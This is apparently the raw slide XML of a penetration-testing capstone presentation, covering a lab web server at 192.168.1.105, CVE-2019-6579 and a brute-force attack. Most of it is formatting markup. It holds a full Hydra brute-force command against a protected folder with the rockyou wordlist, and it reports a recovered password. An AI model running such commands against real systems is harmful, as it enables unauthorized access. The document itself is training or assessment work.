              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">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1" name="Google Shape;71;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="182875">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2" name="Google Shape;72;p9"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906455"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274375" y="640080"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4"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Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="76" name="Shape 76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="24309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79" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="139" r="149" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="2002535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="4570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theme" Target="../theme/theme2.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Lst>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1"/>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12.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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131.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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133.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0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07.png"/><Relationship Id="rId4"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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Prepared by: Lauren Evans</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9078300" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="74800" lvl="0" marL="8612000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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63"/>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Open Web Port (80) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>CVE-2019-6579 (Continued)</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91077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11</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;p63"/>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24" name="Google Shape;1124;p63"/>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25" name="Google Shape;1125;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5122950" y="2785848"/>
            <a:ext cx="2044750" cy="1369825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6488850" y="3729596"/>
            <a:ext cx="2547426" cy="1187062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079275" y="669975"/>
            <a:ext cx="3954776" cy="3119324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156800" y="725575"/>
            <a:ext cx="2428500" cy="2145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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Navigating to the web server at 192.168.1.105 was the next step.  The screenshot shown is the web server homepage, displaying company folders. Reading through the files located in these confirms the existence of a secret folder which needed to be accessed.</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rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200">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6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Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9168600" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="8686800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>12</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p64"/>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4"/>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I used Hydra which is already pre-installed on Kali Linux.  I also required a password list - in this case I used rockyou.txt</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0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Command: hydra -l ashton -p /use/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/</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0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A hash of Ryan’s password was found.</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37" name="Google Shape;1137;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1138" name="Google Shape;1138;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39" name="Google Shape;1139;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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1141" name="Google Shape;1141;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2" name="Google Shape;1142;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3" name="Google Shape;1143;p64"/>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4"/>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Password for Ashton was tested against the common password dictionary “rockyou”</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0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Access to the secret_folder</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0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Access to /webdav system</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ryan’s password.dav was found: linux4u</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1146" name="Google Shape;1146;p64"/>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47" name="Google Shape;1147;p64"/>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8" name="Google Shape;1148;p64"/>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4"/>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50" name="Google Shape;1150;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733350" y="1422125"/>
            <a:ext cx="3289275" cy="856575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5766138" y="2025550"/>
            <a:ext cx="3063526" cy="1399250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822475" y="3589538"/>
            <a:ext cx="3901999" cy="954500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="96225" y="4448300"/>
            <a:ext cx="8843849" cy="4683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6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Brute-force Attack (continued)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="91440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13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1161" name="Google Shape;1161;p6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62" name="Google Shape;1162;p65"/>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63" name="Google Shape;1163;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
